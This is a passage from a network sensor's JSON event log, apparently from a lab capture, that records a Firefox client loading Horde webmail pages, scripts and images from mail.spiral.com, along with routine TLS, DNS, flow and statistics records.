Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} {"timestamp":"2020-02-29T00:27:19.697768+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":4}} {"timestamp":"2020-02-29T00:27:19.741338+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:27:19.741554+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:27:23.000176+0000","event_type":"stats","stats":{"uptime":15295,"capture":{"kernel_packets":142546,"kernel_drops":0},"decoder":{"pkts":142586,"bytes":97913480,"invalid":196,"ipv4":140985,"ipv6":10,"ethernet":142586,"raw":0,"null":0,"sll":0,"tcp":135382,"udp":5392,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090144},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2929,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2945,"synack":2936,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1932,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2467,"failed_udp":116},"tx":{"http":5076,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2551}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":11220,"memcap_state":0,"memcap_global":0},"http":{"memuse":105176,"memcap":0}}} {"timestamp":"2020-02-29T00:27:23.186394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:27:23.186770+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} {"timestamp":"2020-02-29T00:27:23.188334+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":5}} {"timestamp":"2020-02-29T00:27:23.188587+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:27:24.178077+0000","flow_id":1770852327399578,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34308,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:27:24.701651+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53184,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":0}} {"timestamp":"2020-02-29T00:27:26.000229+0000","flow_id":1691541457050508,"event_type":"flow","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":56,"bytes_toserver":8649,"bytes_toclient":66438,"start":"2020-02-29T00:26:19.957324+0000","end":"2020-02-29T00:26:25.439540+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000477+0000","flow_id":1289824575955109,"event_type":"flow","src_ip":"192.168.10.81","src_port":53152,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:26:20.008357+0000","end":"2020-02-29T00:26:25.160374+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000669+0000","flow_id":1460171568849225,"event_type":"flow","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1862,"bytes_toclient":1979,"start":"2020-02-29T00:26:20.008521+0000","end":"2020-02-29T00:26:25.089944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000890+0000","flow_id":371298575065439,"event_type":"flow","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":30,"bytes_toserver":5040,"bytes_toclient":31417,"start":"2020-02-29T00:26:20.008543+0000","end":"2020-02-29T00:26:25.702106+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.001002+0000","flow_id":1225885397469246,"event_type":"flow","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":83,"pkts_toclient":121,"bytes_toserver":13296,"bytes_toclient":151458,"start":"2020-02-29T00:26:14.837694+0000","end":"2020-02-29T00:26:25.698980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.001137+0000","flow_id":1673743112610025,"event_type":"flow","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1906,"bytes_toclient":2538,"start":"2020-02-29T00:26:20.008425+0000","end":"2020-02-29T00:26:25.432430+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.800225+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46613,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46428,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:26.826777+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":5}} {"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:26.991245+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769}} {"timestamp":"2020-02-29T00:27:27.089615+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23886,"tx_id":6}} {"timestamp":"2020-02-29T00:27:27.091932+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:27:27.094641+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":7}} {"timestamp":"2020-02-29T00:27:27.113034+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:27:27.116099+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":6}} {"timestamp":"2020-02-29T00:27:27.116343+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} {"timestamp":"2020-02-29T00:27:27.115958+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.116330+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:27:27.118664+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:27:27.120068+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53188,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:27:27.121899+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":0}} {"timestamp":"2020-02-29T00:27:27.121238+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":7}} {"timestamp":"2020-02-29T00:27:27.121786+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} {"timestamp":"2020-02-29T00:27:27.124589+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.125654+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":9}} {"timestamp":"2020-02-29T00:27:27.165296+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} {"timestamp":"2020-02-29T00:27:27.165341+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} {"timestamp":"2020-02-29T00:27:27.169218+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:27:27.238565+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":9}} 